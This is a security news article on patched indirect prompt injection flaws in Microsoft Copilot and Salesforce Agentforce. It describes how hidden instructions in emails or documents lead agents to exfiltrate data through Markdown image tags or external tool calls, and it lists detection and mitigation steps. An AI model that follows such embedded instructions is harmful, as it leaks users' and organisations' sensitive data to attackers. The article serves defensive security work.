Microsoft and Salesforce Patch Prompt Injection Flaws in AI Agents
- [01] Attackers can use indirect prompt injection to exfiltrate sensitive enterprise data from AI agents to external malicious servers.
- [02] Microsoft Copilot and Salesforce Agentforce platforms are primary targets for these logic-based data leak vulnerabilities.
- [03] Organizations must apply platform updates and enforce the principle of least privilege for all autonomous AI agents.
Recent research has highlighted significant security gaps in the rapidly expanding ecosystem of autonomous AI agents. According to Dark Reading, both Microsoft and Salesforce have recently addressed vulnerabilities that allowed for Phishing-style prompt injection to trigger unauthorized data exfiltration. These flaws reside in Microsoft Copilot and Salesforce Agentforce, two major platforms designed to automate business workflows by interacting with internal company data. These vulnerabilities underscore the risks associated with granting AI tools broad access to sensitive corporate environments without adequate input sanitization.
The vulnerabilities are classified as indirect prompt injection. This TTP involves an attacker placing malicious instructions within a document or data source that the AI agent is likely to process. Unlike direct prompt injection, where a user interacts directly with the chatbot, indirect injection exploits the agent’s ability to ingest third-party data. For instance, an attacker could send an email or share a document containing hidden text that instructs the AI to summarize the contents and send that summary to a remote C2 server. This type of attack is particularly insidious because it requires no direct interaction between the victim and the malicious actor.
How to detect indirect prompt injection attacks
Detecting these attacks requires a shift in traditional monitoring. Security teams must look for anomalies in how AI agents interact with external APIs or URLs. If a SOC analyst observes an AI agent attempting to render an image from an unknown external domain or append sensitive user data to a URL query parameter, it may indicate a successful injection. Since many of these agents operate within the context of a user’s session, the attack can bypass Zero Trust boundaries if the agent is over-privileged.
In the Salesforce Agentforce case, researchers found that the agent could be manipulated into using a “tool” to call an external endpoint. This could result in the leakage of session tokens or proprietary data. Similarly, Microsoft Copilot vulnerabilities involved manipulating the agent’s rendering capabilities to leak data via Markdown-based image tags. While no specific CVE has been assigned to these logic-based flaws in the cloud platform layer, the impact is comparable to high-severity vulnerabilities that lead to data loss.
Microsoft Copilot prompt injection mitigation
To protect against these threats, defenders should focus on the principle of least privilege for AI identities. Just as a human user should only have access to the data necessary for their role, an AI agent should be restricted to specific data silos. Implementing strict egress filtering is also essential. By restricting the domains that an AI agent can communicate with, organizations can prevent data from being transmitted to attacker-controlled infrastructure. This reduces the likelihood of a successful Supply Chain Attack where compromised external data sources affect internal AI logic.
Furthermore, the Salesforce Agentforce data leak protection updates emphasize the importance of human-in-the-loop (HITL) requirements for high-risk actions. When an AI agent attempts to send data outside the corporate environment or perform a Privilege Escalation check, the system should require manual approval. This serves as a critical circuit breaker against automated data exfiltration. As organizations continue to integrate AI into their core operations, the focus must remain on verifying the integrity of the data being consumed by these autonomous systems.
Advertisement